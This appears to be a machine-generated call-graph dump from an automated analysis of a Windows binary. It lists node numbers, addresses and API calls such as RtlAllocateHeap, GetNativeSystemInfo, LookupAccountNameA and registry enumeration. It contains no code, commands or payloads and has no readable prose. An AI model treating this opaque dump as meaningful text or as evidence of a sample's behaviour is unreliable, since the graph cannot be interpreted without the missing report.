14614->14580 14614->14610 14617 c35384 14615->14617 14618 c34d1c 14616->14618 14619 c25b20 RtlAllocateHeap 14617->14619 14620 c37870 RtlAllocateHeap 14618->14620 14621 c3538f 14619->14621 14622 c34d37 14620->14622 14623 c37870 RtlAllocateHeap 14621->14623 14624 c25b20 RtlAllocateHeap 14622->14624 14625 c353ad 14623->14625 14626 c34d3e 14624->14626 14627 c25b20 RtlAllocateHeap 14625->14627 14630 c37f30 RtlAllocateHeap 14626->14630 14628 c353b8 14627->14628 14629 c37870 RtlAllocateHeap 14628->14629 14631 c353d6 14629->14631 14632 c34d77 14630->14632 14633 c25b20 RtlAllocateHeap 14631->14633 14634 c342a0 17 API calls 14632->14634 14635 c353e1 14633->14635 14634->14580 14636 c37870 RtlAllocateHeap 14635->14636 14637 c353ff 14636->14637 14638 c25b20 RtlAllocateHeap 14637->14638 14639 c3540a 14638->14639 14640 c37870 RtlAllocateHeap 14639->14640 14641 c35428 14640->14641 14642 c25b20 RtlAllocateHeap 14641->14642 14643 c35433 14642->14643 14644 c37870 RtlAllocateHeap 14643->14644 14645 c35451 14644->14645 14646 c25b20 RtlAllocateHeap 14645->14646 14647 c3545c 14646->14647 14648 c37870 RtlAllocateHeap 14647->14648 14649 c3547a 14648->14649 14650 c25b20 RtlAllocateHeap 14649->14650 14651 c35485 14650->14651 14652 c37870 RtlAllocateHeap 14651->14652 14653 c354a1 14652->14653 14654 c25b20 RtlAllocateHeap 14653->14654 14655 c354ac 14654->14655 14656 c37870 RtlAllocateHeap 14655->14656 14657 c354c3 14656->14657 14658 c25b20 RtlAllocateHeap 14657->14658 14659 c354ce 14658->14659 14660 c37870 RtlAllocateHeap 14659->14660 14661 c354e5 14660->14661 14662 c25b20 RtlAllocateHeap 14661->14662 14663 c354f0 14662->14663 14664 c37870 RtlAllocateHeap 14663->14664 14665 c3550c 14664->14665 14666 c25b20 RtlAllocateHeap 14665->14666 14667 c35517 14666->14667 14668 c38250 RtlAllocateHeap 14667->14668 14669 c3552b 14668->14669 14670 c38150 RtlAllocateHeap 14669->14670 14671 c3553f 14670->14671 14672 c38150 RtlAllocateHeap 14671->14672 14673 c35553 14672->14673 14674 c38150 RtlAllocateHeap 14673->14674 14675 c35567 14674->14675 14676 c38250 RtlAllocateHeap 14675->14676 14677 c3557b 14676->14677 14678 c38150 RtlAllocateHeap 14677->14678 14679 c3558f 14678->14679 14680 c38250 RtlAllocateHeap 14679->14680 14681 c355a3 14680->14681 14682 c38150 RtlAllocateHeap 14681->14682 14683 c355b7 14682->14683 14684 c38250 RtlAllocateHeap 14683->14684 14685 c355cb 14684->14685 14686 c38150 RtlAllocateHeap 14685->14686 14687 c355df 14686->14687 14688 c38250 RtlAllocateHeap 14687->14688 14689 c355f3 14688->14689 14690 c38150 RtlAllocateHeap 14689->14690 14691 c35607 14690->14691 14692 c38250 RtlAllocateHeap 14691->14692 14693 c3561b 14692->14693 14694 c38150 RtlAllocateHeap 14693->14694 14695 c3562f 14694->14695 14696 c38250 RtlAllocateHeap 14695->14696 14697 c35643 14696->14697 14698 c38150 RtlAllocateHeap 14697->14698 14699 c35657 14698->14699 14700 c38250 RtlAllocateHeap 14699->14700 14701 c3566b 14700->14701 14702 c38150 RtlAllocateHeap 14701->14702 14703 c3567f 14702->14703 14704 c38250 RtlAllocateHeap 14703->14704 14705 c35693 14704->14705 14706 c38150 RtlAllocateHeap 14705->14706 14707 c356a7 14706->14707 14708 c38150 RtlAllocateHeap 14707->14708 14709 c356bb 14708->14709 14710 c38150 RtlAllocateHeap 14709->14710 14711 c356cf 14710->14711 14712 c38250 RtlAllocateHeap 14711->14712 14717 c356e3 shared_ptr 14712->14717 14713 c36377 14715 c37870 RtlAllocateHeap 14713->14715 14714 c364cb 14716 c37870 RtlAllocateHeap 14714->14716 14718 c3638d 14715->14718 14719 c364e0 14716->14719 14717->14713 14717->14714 14720 c25b20 RtlAllocateHeap 14718->14720 14721 c37870 RtlAllocateHeap 14719->14721 14723 c36398 14720->14723 14722 c364f5 14721->14722 14724 c24960 RtlAllocateHeap 14722->14724 14725 c38250 RtlAllocateHeap 14723->14725 14726 c36504 14724->14726 14736 c363ac __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14725->14736 14727 c375d0 RtlAllocateHeap 14726->14727 14734 c3654b 14727->14734 14728 c36646 14729 c37870 RtlAllocateHeap 14728->14729 14730 c3665c 14729->14730 14731 c25b20 RtlAllocateHeap 14730->14731 14733 c36667 14731->14733 14732 c38bd0 RtlAllocateHeap 14732->14734 14735 c38150 RtlAllocateHeap 14733->14735 14734->14728 14734->14732 14735->14736 14736->14247 14738 c3c109 RtlAllocateHeap 14737->14738 14739 c3807a 14738->14739 14739->14225 15138 c3c019 14740->15138 14742 c3c0da std::_Throw_future_error 15141 c3c08d 14743->15141 14745 c3c11a std::_Throw_future_error 14745->14247 14769 4ef0bcc 14746->14769 14747 c2660f LookupAccountNameA 14748 c26662 14747->14748 14749 c37870 RtlAllocateHeap 14748->14749 14750 c26676 14749->14750 14751 c25b20 RtlAllocateHeap 14750->14751 14752 c26681 14751->14752 15144 c22280 14752->15144 14754 c26699 shared_ptr 14755 c37870 RtlAllocateHeap 14754->14755 14767 c268b3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14754->14767 14756 c26702 14755->14756 14757 c25b20 RtlAllocateHeap 14756->14757 14758 c2670d 14757->14758 14759 c22280 3 API calls 14758->14759 14768 c26727 shared_ptr 14759->14768 14760 c26822 14761 c37f30 RtlAllocateHeap 14760->14761 14763 c2686c 14761->14763 14762 c37870 RtlAllocateHeap 14762->14768 14764 c37f30 RtlAllocateHeap 14763->14764 14764->14767 14765 c25b20 RtlAllocateHeap 14765->14768 14766 c22280 3 API calls 14766->14768 14767->14144 14768->14760 14768->14762 14768->14765 14768->14766 14768->14767 14769->14747 14778 c26998 shared_ptr 14770->14778 14779 c26c71 14770->14779 14771 c26d33 14774 c38070 RtlAllocateHeap 14771->14774 14772 c26c94 14773 c37f30 RtlAllocateHeap 14772->14773 14776 c26cb3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14773->14776 14774->14776 14775 c37f30 RtlAllocateHeap 14775->14778 14776->14154 14777 c391b0 RtlAllocateHeap 14777->14778 14778->14771 14778->14775 14778->14776 14778->14777 14778->14779 14779->14771 14779->14772 14781 c27d66 __cftof 14780->14781 14782 c37870 RtlAllocateHeap 14781->14782 14821 c27eb8 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14781->14821 14783 c27d97 14782->14783 14784 c25b20 RtlAllocateHeap 14783->14784 14785 c27da2 14784->14785 14786 c37870 RtlAllocateHeap 14785->14786 14787 c27dc4 14786->14787 14788 c25b20 RtlAllocateHeap 14787->14788 14790 c27dcf shared_ptr 14788->14790 14789 c27ea3 GetNativeSystemInfo 14791 c27ea7 14789->14791 14790->14789 14790->14791 14790->14821 14792 c27fe9 14791->14792 14793 c27f0f 14791->14793 14791->14821 14794 c37870 RtlAllocateHeap 14792->14794 14795 c37870 RtlAllocateHeap 14793->14795 14796 c28015 14794->14796 14797 c27f30 14795->14797 14798 c25b20 RtlAllocateHeap 14796->14798 14799 c25b20 RtlAllocateHeap 14797->14799 14800 c2801c 14798->14800 14801 c27f37 14799->14801 14803 c37870 RtlAllocateHeap 14800->14803 14802 c37870 RtlAllocateHeap 14801->14802 14804 c27f4f 14802->14804 14805 c28034 14803->14805 14806 c25b20 RtlAllocateHeap 14804->14806 14807 c25b20 RtlAllocateHeap 14805->14807 14808 c27f56 14806->14808 14809 c2803b 14807->14809 14810 c25c60 5 API calls 14808->14810 14811 c25c60 5 API calls 14809->14811 14812 c27f70 14810->14812 14813 c28051 14811->14813 15266 c58a81 14812->15266 14814 c37870 RtlAllocateHeap 14813->14814 14816 c2806c 14814->14816 14817 c25b20 RtlAllocateHeap 14816->14817 14818 c28073 14817->14818 14819 c25640 RtlAllocateHeap 14818->14819 14820 c28082 14819->14820 14822 c37870 RtlAllocateHeap 14820->14822 14821->14156 14823 c280bd 14822->14823 14824 c25b20 RtlAllocateHeap 14823->14824 14825 c280c4 14824->14825 14826 c37870 RtlAllocateHeap 14825->14826 14827 c280dc 14826->14827 14828 c25b20 RtlAllocateHeap 14827->14828 14829 c280e3 14828->14829 14830 c25c60 5 API calls 14829->14830 14831 c280f9 14830->14831 14832 c37870 RtlAllocateHeap 14831->14832 14833 c28114 14832->14833 14834 c25b20 RtlAllocateHeap 14833->14834 14835 c2811b 14834->14835 14836 c25640 RtlAllocateHeap 14835->14836 14837 c2812a 14836->14837 14838 c37870 RtlAllocateHeap 14837->14838 14839 c28165 14838->14839 14840 c25b20 RtlAllocateHeap 14839->14840 14841 c2816c 14840->14841 14842 c37870 RtlAllocateHeap 14841->14842 14843 c28184 14842->14843 14844 c25b20 RtlAllocateHeap 14843->14844 14845 c2818b 14844->14845 14846 c25c60 5 API calls 14845->14846 14847 c281a1 14846->14847 14848 c37870 RtlAllocateHeap 14847->14848 14849 c281bc 14848->14849 14850 c25b20 RtlAllocateHeap 14849->14850 14851 c281c3 14850->14851 14852 c25640 RtlAllocateHeap 14851->14852 14852->14821 14854 c24594 14853->14854 14854->14854 14855 c37f30 RtlAllocateHeap 14854->14855 14856 c24607 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14854->14856 14855->14856 14856->14160 14858 c28315 __cftof 14857->14858 14859 c37870 RtlAllocateHeap 14858->14859 14868 c28333 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14858->14868 14860 c2834c 14859->14860 14861 c25b20 RtlAllocateHeap 14860->14861 14862 c28357 14861->14862 14863 c37870 RtlAllocateHeap 14862->14863 14864 c28379 14863->14864 14865 c25b20 RtlAllocateHeap 14864->14865 14866 c28384 shared_ptr 14865->14866 14867 c28454 GetNativeSystemInfo 14866->14867 14866->14868 14867->14868 14868->14163 15269 c54020 14869->15269 14872 c25d10 RegCloseKey 14873 c25d36 14872->14873 14873->14873 14874 c37f30 RtlAllocateHeap 14873->14874 14876 c25d4e 14874->14876 14875 c25db6 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14875->14212 14876->14875 14877 c37f30 RtlAllocateHeap 14876->14877 14878 c25f99 14877->14878 14879 c37f30 RtlAllocateHeap 14878->14879 14880 c25fcd 14879->14880 14881 c37f30 RtlAllocateHeap 14880->14881 14882 c25ffe 14881->14882 14883 c37f30 RtlAllocateHeap 14882->14883 14884 c2602f 14883->14884 14885 c37f30 RtlAllocateHeap 14884->14885 14886 c26060 RegOpenKeyExA 14885->14886 14887 c2645a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14886->14887 14892 c260b3 __cftof 14886->14892 14887->14212 14888 c26153 RegEnumValueW 14888->14892 14889 c37c50 RtlAllocateHeap 14889->14892 14890 c38090 RtlAllocateHeap 14890->14892 14891 c37870 RtlAllocateHeap 14891->14892 14892->14887 14892->14888 14892->14889 14892->14890 14892->14891 14893 c25c60 RtlAllocateHeap 14892->14893 14893->14892 14895 c37c9c 14894->14895 14898 c37c71 14894->14898 14896 c37d90 14895->14896 14899 c37d8b 14895->14899 14900 c37cf0 14895->14900 14901 c37d17 14895->14901 14897 c391a0 RtlAllocateHeap 14896->14897 14906 c37d01 shared_ptr 14897->14906 14898->14238 14902 c22440 RtlAllocateHeap 14899->14902 14900->14899 14903 c37cfb 14900->14903 14905 c3d312 RtlAllocateHeap 14901->14905 14901->14906 14902->14896 14904 c3d312 RtlAllocateHeap 14903->14904 14904->14906 14905->14906 14906->14238 14908 c375d0 RtlAllocateHeap 14907->14908 14911 c380e0 14908->14911 14909 c38132 14909->14248 14911->14909 15271 c38bd0 14911->15271 14913 c38269 14912->14913 14915 c3827d 14913->14915 15283 c38e70 14913->15283 14915->14334 14917 c381c2 14916->14917 14918 c38178 14916->14918 14922 c38e70 RtlAllocateHeap 14917->14922 14923 c381d1 14917->14923 14918->14917 14919 c38181 14918->14919 14920 c391b0 RtlAllocateHeap 14919->14920 14921 c3818a 14920->14921 14921->14336 14922->14923 14923->14336 14925 c37f30 RtlAllocateHeap 14924->14925 14926 c249b3 14925->14926 14927 c37f30 RtlAllocateHeap 14926->14927 14928 c249cc 14927->14928 15301 c24650 14928->15301 14930 c24a59 shared_ptr 14930->14391 14932 c375eb 14931->14932 14942 c376d4 shared_ptr 14931->14942 14935 c3765a 14932->14935 14937 c37681 14932->14937 14941 c3766b 14932->14941 14932->14942 14933 c391a0 RtlAllocateHeap 14934 c37766 14933->14934 14936 c22440 RtlAllocateHeap 14934->14936 14935->14934 14939 c3d312 RtlAllocateHeap 14935->14939 14938 c3776b 14936->14938 14940 c3d312 RtlAllocateHeap 14937->14940 14937->14941 14939->14941 14940->14941 14941->14933 14941->14942 14942->14399 14969 c37df0 14943->14969 14945 c2587b 14946 c258f0 14945->14946 14947 c37df0 RtlAllocateHeap 14946->14947 14960 c25955 14947->14960 14948 c37870 RtlAllocateHeap 14948->14960 14949 c25b19 14951 c38070 RtlAllocateHeap 14949->14951 14950 c25aed __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14950->14406 14953 c25b1e 14951->14953 14952 c37f30 RtlAllocateHeap 14952->14960 14954 c25850 RtlAllocateHeap 14953->14954 14956 c25b64 14954->14956 14957 c258f0 RtlAllocateHeap 14956->14957 14958 c25b7a 14957->14958 14959 c24af0 RtlAllocateHeap 14958->14959 14961 c25b8b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14959->14961 14960->14948 14960->14949 14960->14950 14960->14952 14982 c25640 14960->14982 14961->14406 14963 c24b24 14962->14963 14964 c24b4e 14962->14964 14965 c37f30 RtlAllocateHeap 14963->14965 14967 c37df0 RtlAllocateHeap 14964->14967 14966 c24b3b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14965->14966 14966->14408 14968 c24bab __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14967->14968 14968->14408 14971 c37e0e __cftof 14969->14971 14972 c37e37 14969->14972 14970 c391a0 RtlAllocateHeap 14973 c37f28 14970->14973 14971->14945 14975 c37e8b 14972->14975 14976 c37eae 14972->14976 14980 c37e9c __cftof 14972->14980 14974 c22440 RtlAllocateHeap 14973->14974 14977 c37f2d 14974->14977 14975->14973 14979 c3d312 RtlAllocateHeap 14975->14979 14978 c3d312 RtlAllocateHeap 14976->14978 14976->14980 14978->14980 14979->14980 14980->14970 14981 c37f05 shared_ptr 14980->14981 14981->14945 14986 c25770 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 14982->14986 14987 c256a9 shared_ptr 14982->14987 14983 c2583a 14985 c38070 RtlAllocateHeap 14983->14985 14984 c37f30 RtlAllocateHeap 14984->14987 14985->14986 14986->14960 14987->14983 14987->14984 14987->14986 14989 c586e9 14988->14989 14990 c5683a __fassign 3 API calls 14989->14990 14993 c586fe __cftof __dosmaperr 14989->14993 14992 c5872e 14990->14992 14992->14993 14994 c58925 14992->14994 14993->14447 14995 c58962 14994->14995 14996 c58932 14994->14996 15005 c5d2e9 14995->15005 14997 c58941 __fassign 14996->14997 15000 c5d30d 14996->15000 14997->14992 15001 c5683a __fassign 3 API calls 15000->15001 15003 c5d32a 15001->15003 15002 c5d33a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15002->14997 15003->15002 15009 c5f07f 15003->15009 15006 c5d2f4 15005->15006 15007 c5b4bb __fassign 2 API calls 15006->15007 15008 c5d304 15007->15008 15008->14997 15010 c5683a __fassign 3 API calls 15009->15010 15012 c5f09f __fassign 15010->15012 15011 c5f0f2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __cftof __fassign __freea 15011->15002 15012->15011 15013 c5af0b __fassign RtlAllocateHeap 15012->15013 15013->15011 15015 c391c4 15014->15015 15018 c391d5 15015->15018 15126 c39410 15015->15126 15017 c3925b 15017->14480 15018->14480 15020 c3358f 15019->15020 15024 c33d7f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15019->15024 15021 c37f30 RtlAllocateHeap 15020->15021 15022 c335c0 15021->15022 15023 c34237 15022->15023 15026 c37f30 RtlAllocateHeap 15022->15026 15025 c38070 RtlAllocateHeap 15023->15025 15024->14480 15027 c3423c 15025->15027 15028 c3360f 15026->15028 15029 c38070 RtlAllocateHeap 15027->15029 15028->15023 15030 c37f30 RtlAllocateHeap 15028->15030 15034 c34241 15029->15034 15031 c33653 15030->15031 15031->15023 15032 c33675 15031->15032 15033 c37f30 RtlAllocateHeap 15032->15033 15035 c33695 15033->15035 15036 c38070 RtlAllocateHeap 15034->15036 15037 c37870 RtlAllocateHeap 15035->15037 15040 c34250 15036->15040 15038 c336a8 15037->15038 15039 c25b20 RtlAllocateHeap 15038->15039 15042 c336b3 15039->15042 15041 c3c0c9 std::_Xinvalid_argument RtlAllocateHeap 15040->15041 15053 c33b89 shared_ptr 15041->15053 15042->15027 15043 c336ff 15042->15043 15044 c37f30 RtlAllocateHeap 15043->15044 15047 c33721 shared_ptr 15044->15047 15045 c3c109 RtlAllocateHeap 15045->15024 15046 c29820 RtlAllocateHeap 15048 c33782 15046->15048 15047->15034 15047->15046 15049 c37870 RtlAllocateHeap 15048->15049 15048->15053 15050 c33799 15049->15050 15051 c25b20 RtlAllocateHeap 15050->15051 15052 c337a4 15051->15052 15054 c37f30 RtlAllocateHeap 15052->15054 15053->15024 15053->15045 15056 c337ec shared_ptr 15054->15056 15055 c338cd 15057 c37f30 RtlAllocateHeap 15055->15057 15056->15034 15056->15055 15104 c339c7 shared_ptr __dosmaperr 15056->15104 15072 c338ea shared_ptr 15057->15072 15058 c58979 3 API calls 15059 c33a8a 15058->15059 15059->15040 15060 c33a99 15059->15060 15060->15053 15062 c33ab2 15060->15062 15063 c33e52 15060->15063 15064 c33d84 15060->15064 15065 c33b9d 15060->15065 15061 c37870 RtlAllocateHeap 15066 c339a6 15061->15066 15070 c37f30 RtlAllocateHeap 15062->15070 15068 c37870 RtlAllocateHeap 15063->15068 15067 c37f30 RtlAllocateHeap 15064->15067 15069 c37f30 RtlAllocateHeap 15065->15069 15073 c37870 RtlAllocateHeap 15066->15073 15074 c33dac 15067->15074 15075 c33e66 15068->15075 15076 c33bc5 15069->15076 15071 c33ada 15070->15071 15077 c37870 RtlAllocateHeap 15071->15077 15072->15040 15072->15061 15078 c339b8 15073->15078 15079 c37870 RtlAllocateHeap 15074->15079 15080 c37870 RtlAllocateHeap 15075->15080 15081 c37870 RtlAllocateHeap 15076->15081 15082 c33af8 15077->15082 15083 c24960 RtlAllocateHeap 15078->15083 15084 c33dca 15079->15084 15085 c33e7e 15080->15085 15086 c33be3 15081->15086 15087 c25b20 RtlAllocateHeap 15082->15087 15083->15104 15088 c25b20 RtlAllocateHeap 15084->15088 15089 c37870 RtlAllocateHeap 15085->15089 15090 c25b20 RtlAllocateHeap 15086->15090 15091 c33aff 15087->15091 15092 c33dd1 15088->15092 15093 c33e96 15089->15093 15094 c33bea 15090->15094 15095 c37870 RtlAllocateHeap 15091->15095 15096 c37870 RtlAllocateHeap 15092->15096 15097 c37870 RtlAllocateHeap 15093->15097 15098 c37870 RtlAllocateHeap 15094->15098 15099 c33b17 15095->15099 15100 c33de9 15096->15100 15097->15053 15101 c33bff 15098->15101 15102 c37870 RtlAllocateHeap 15099->15102 15103 c37870 RtlAllocateHeap 15100->15103 15105 c37870 RtlAllocateHeap 15101->15105 15106 c33b2f 15102->15106 15107 c33e01 15103->15107 15104->15040 15104->15058 15108 c33c17 15105->15108 15109 c37870 RtlAllocateHeap 15106->15109 15110 c37870 RtlAllocateHeap 15107->15110 15111 c37870 RtlAllocateHeap 15108->15111 15113 c33b47 15109->15113 15114 c33e19 15110->15114 15112 c33c2f 15111->15112 15116 c37870 RtlAllocateHeap 15112->15116 15117 c37870 RtlAllocateHeap 15113->15117 15115 c37870 RtlAllocateHeap 15114->15115 15118 c33e31 15115->15118 15119 c33c47 15116->15119 15120 c33b5f 15117->15120 15121 c37870 RtlAllocateHeap 15118->15121 15122 c37870 RtlAllocateHeap 15119->15122 15123 c37870 RtlAllocateHeap 15120->15123 15124 c33b77 15121->15124 15122->15053 15123->15124 15125 c37870 RtlAllocateHeap 15124->15125 15125->15053 15127 c39549 15126->15127 15128 c3943b 15126->15128 15129 c391a0 RtlAllocateHeap 15127->15129 15132 c39482 15128->15132 15133 c394a9 15128->15133 15130 c3954e 15129->15130 15131 c22440 RtlAllocateHeap 15130->15131 15137 c39493 shared_ptr 15131->15137 15132->15130 15134 c3948d 15132->15134 15136 c3d312 RtlAllocateHeap 15133->15136 15133->15137 15135 c3d312 RtlAllocateHeap 15134->15135 15135->15137 15136->15137 15137->15017 15139 c222a0 std::future_error::future_error RtlAllocateHeap 15138->15139 15140 c3c02b 15139->15140 15140->14742 15142 c222a0 std::future_error::future_error RtlAllocateHeap 15141->15142 15143 c3c09f 15142->15143 15143->14745 15147 c22240 15144->15147 15148 c22256 15147->15148 15151 c58667 15148->15151 15154 c57456 15151->15154 15153 c22264 15153->14754 15155 c57496 15154->15155 15159 c5747e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __cftof __dosmaperr 15154->15159 15156 c5683a __fassign 3 API calls 15155->15156 15155->15159 15157 c574ae 15156->15157 15160 c57a11 15157->15160 15159->15153 15162 c57a22 15160->15162 15161 c57a31 __cftof __dosmaperr 15161->15159 15162->15161 15167 c57fb5 15162->15167 15172 c57c0f 15162->15172 15177 c57c35 15162->15177 15198 c57d83 15162->15198 15168 c57fc5 15167->15168 15169 c57fbe 15167->15169 15168->15162 15217 c5799d 15169->15217 15171 c57fc4 15171->15162 15173 c57c18 15172->15173 15174 c57c1f 15172->15174 15175 c5799d 3 API calls 15173->15175 15174->15162 15176 c57c1e 15175->15176 15176->15162 15178 c57c3c 15177->15178 15183 c57c56 __cftof __dosmaperr 15177->15183 15179 c57d9c 15178->15179 15180 c57e08 15178->15180 15178->15183 15188 c57da8 15179->15188 15191 c57ddf 15179->15191 15181 c57e0f 15180->15181 15182 c57e4e 15180->15182 15180->15191 15184 c57db6 15181->15184 15185 c57e14 15181->15185 15239 c58451 15182->15239 15183->15162 15193 c57dd8 15184->15193 15196 c57dc4 15184->15196 15233 c5808e 15184->15233 15187 c57e19 15185->15187 15185->15191 15187->15193 15187->15196 15225 c58432 15187->15225 15188->15184 15192 c57def 15188->15192 15188->15196 15191->15193 15191->15196 15229 c5826d 15191->15229 15192->15193 15221 c581dd 15192->15221 15193->15162 15196->15193 15242 c58537 15196->15242 15199 c57d9c 15198->15199 15200 c57e08 15198->15200 15208 c57ddf 15199->15208 15210 c57da8 15199->15210 15201 c57e0f 15200->15201 15202 c57e4e 15200->15202 15200->15208 15203 c57db6 15201->15203 15204 c57e14 15201->15204 15205 c58451 RtlAllocateHeap 15202->15205 15206 c5808e 3 API calls 15203->15206 15214 c57dc4 15203->15214 15216 c57dd8 15203->15216 15207 c57e19 15204->15207 15204->15208 15205->15214 15206->15214 15213 c58432 RtlAllocateHeap 15207->15213 15207->15214 15207->15216 15211 c5826d RtlAllocateHeap 15208->15211 15208->15214 15208->15216 15209 c57def 15212 c581dd 3 API calls 15209->15212 15209->15216 15210->15203 15210->15209 15210->15214 15211->15214 15212->15214 15213->15214 15215 c58537 3 API calls 15214->15215 15214->15216 15215->15216 15216->15162 15218 c579af __dosmaperr 15217->15218 15219 c58979 3 API calls 15218->15219 15220 c579d2 __dosmaperr 15219->15220 15220->15171 15223 c581f8 15221->15223 15222 c5822a 15222->15196 15223->15222 15246 c5c65f 15223->15246 15226 c5843e 15225->15226 15227 c5826d RtlAllocateHeap 15226->15227 15228 c58450 15227->15228 15228->15196 15230 c58280 15229->15230 15232 c5829b __cftof __dosmaperr 15230->15232 15249 c575ec 15230->15249 15232->15196 15234 c580a7 15233->15234 15235 c575ec RtlAllocateHeap 15234->15235 15236 c580e4 15235->15236 15253 c5d199 15236->15253 15238 c5815a 15238->15196 15238->15238 15240 c5826d RtlAllocateHeap 15239->15240 15241 c58468 15240->15241 15241->15196 15243 c585aa __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15242->15243 15245 c58554 15242->15245 15243->15193 15244 c5c65f __cftof 3 API calls 15244->15245 15245->15243 15245->15244 15247 c5c504 __cftof GetPEB GetPEB RtlAllocateHeap 15246->15247 15248 c5c677 15247->15248 15248->15222 15250 c57601 __dosmaperr ___free_lconv_mon 15249->15250 15251 c57610 15249->15251 15250->15232 15251->15250 15252 c5af0b __fassign RtlAllocateHeap 15251->15252 15252->15250 15254 c5d1bf 15253->15254 15255 c5d1a9 __cftof __dosmaperr 15253->15255 15254->15255 15256 c5d256 15254->15256 15257 c5d25b 15254->15257 15255->15238 15259 c5d2b5 15256->15259 15260 c5d27f 15256->15260 15258 c5c9b0 GetPEB GetPEB RtlAllocateHeap 15257->15258 15258->15255 15263 c5ccc9 GetPEB GetPEB RtlAllocateHeap 15259->15263 15261 c5d284 15260->15261 15262 c5d29d 15260->15262 15264 c5d00f GetPEB GetPEB RtlAllocateHeap 15261->15264 15265 c5ceb3 GetPEB GetPEB RtlAllocateHeap 15262->15265 15263->15255 15264->15255 15265->15255 15267 c586d7 3 API calls 15266->15267 15268 c58a9f 15267->15268 15268->14821 15270 c25cb7 RegOpenKeyExA 15269->15270 15270->14872 15272 c38bf3 15271->15272 15273 c38cf9 15271->15273 15277 c38c35 15272->15277 15278 c38c5f 15272->15278 15274 c391a0 RtlAllocateHeap 15273->15274 15275 c38cfe 15274->15275 15276 c22440 RtlAllocateHeap 15275->15276 15282 c38c46 shared_ptr 15276->15282 15277->15275 15279 c38c40 15277->15279 15281 c3d312 RtlAllocateHeap 15278->15281 15278->15282 15280 c3d312 RtlAllocateHeap 15279->15280 15280->15282 15281->15282 15282->14911 15284 c38fbe 15283->15284 15287 c38e9b 15283->15287 15285 c391a0 RtlAllocateHeap 15284->15285 15286 c38fc3 15285->15286 15290 c22440 RtlAllocateHeap 15286->15290 15288 c38ee2 15287->15288 15289 c38f0c 15287->15289 15288->15286 15291 c38eed 15288->15291 15293 c3d312 RtlAllocateHeap 15289->15293 15295 c38ef3 15289->15295 15290->15295 15292 c3d312 RtlAllocateHeap 15291->15292 15292->15295 15293->15295 15294 c38fe8 15296 c3d312 RtlAllocateHeap 15294->15296 15295->15294 15297 c38f7c shared_ptr 15295->15297 15298 c22440 std::_Throw_future_error 15295->15298 15296->15297 15297->14915 15299 c537dc ___std_exception_copy RtlAllocateHeap 15298->15299 15300 c22483 15299->15300 15300->14915 15302 c37f30 RtlAllocateHeap 15301->15302 15304 c246c7 shared_ptr 15302->15304 15303 c24806 shared_ptr 15305 c24936 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15303->15305 15306 c37f30 RtlAllocateHeap 15303->15306 15308 c38e70 RtlAllocateHeap 15303->15308 15310 c24954 15303->15310 15304->15303 15307 c37f30 RtlAllocateHeap 15304->15307 15309 c38e70 RtlAllocateHeap 15304->15309 15304->15310 15305->14930 15306->15303 15307->15304 15308->15303 15309->15304 15311 c37f30 RtlAllocateHeap 15310->15311 15312 c249b3 15311->15312 15313 c37f30 RtlAllocateHeap 15312->15313 15314 c249cc 15313->15314 15315 c24650 RtlAllocateHeap 15314->15315 15316 c24a59 shared_ptr 15315->15316 15316->14930 15605 c3a140 15606 c3a1c0 15605->15606 15618 c37040 15606->15618 15608 c3a1fc 15611 c3a260 15608->15611 15624 c37bc0 15608->15624 15636 c23800 15611->15636 15612 c3a3ee shared_ptr 15613 c3a2ce shared_ptr 15613->15612 15614 c3d312 RtlAllocateHeap 15613->15614 15615 c3a38e 15614->15615 15644 c23ea0 15615->15644 15617 c3a3d6 15619 c37081 15618->15619 15620 c3d312 RtlAllocateHeap 15619->15620 15621 c370a8 15620->15621 15622 c3d312 RtlAllocateHeap 15621->15622 15623 c3722b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __cftof __Mtx_init_in_situ 15621->15623 15622->15623 15623->15608 15625 c37bd2 15624->15625 15626 c37c3b 15624->15626 15627 c37bdd 15625->15627 15628 c37c0c 15625->15628 15629 c22440 RtlAllocateHeap 15626->15629 15627->15626 15630 c37be4 15627->15630 15631 c37c29 15628->15631 15634 c3d312 RtlAllocateHeap 15628->15634 15632 c37bea 15629->15632 15633 c3d312 RtlAllocateHeap 15630->15633 15631->15611 15632->15611 15633->15632 15635 c37c16 15634->15635 15635->15611 15639 c2381f 15636->15639 15643 c238b6 15636->15643 15637 c39110 RtlAllocateHeap 15638 c238e5 15637->15638 15638->15613 15641 c238db 15639->15641 15642 c2388d shared_ptr 15639->15642 15639->15643 15640 c37bc0 RtlAllocateHeap 15640->15643 15641->15637 15642->15640 15643->15613 15645 c23f08 15644->15645 15647 c23ede 15644->15647 15648 c23f18 15645->15648 15650 c22bc0 15645->15650 15647->15617 15648->15617 15651 c3d312 RtlAllocateHeap 15650->15651 15652 c22bce 15651->15652 15660 c3b777 15652->15660 15654 c22c02 15655 c22c09 15654->15655 15666 c22c40 15654->15666 15655->15617 15657 c22c18 15669 c22520 15657->15669 15659 c22c25 std::_Throw_future_error 15661 c3b784 15660->15661 15665 c3b7a3 Concurrency::details::_Reschedule_chore 15660->15665 15672 c3caa7 15661->15672 15663 c3b794 15663->15665 15674 c3b74e 15663->15674 15665->15654 15680 c3b72b 15666->15680 15668 c22c72 shared_ptr 15668->15657 15670 c537dc ___std_exception_copy RtlAllocateHeap 15669->15670 15671 c22557 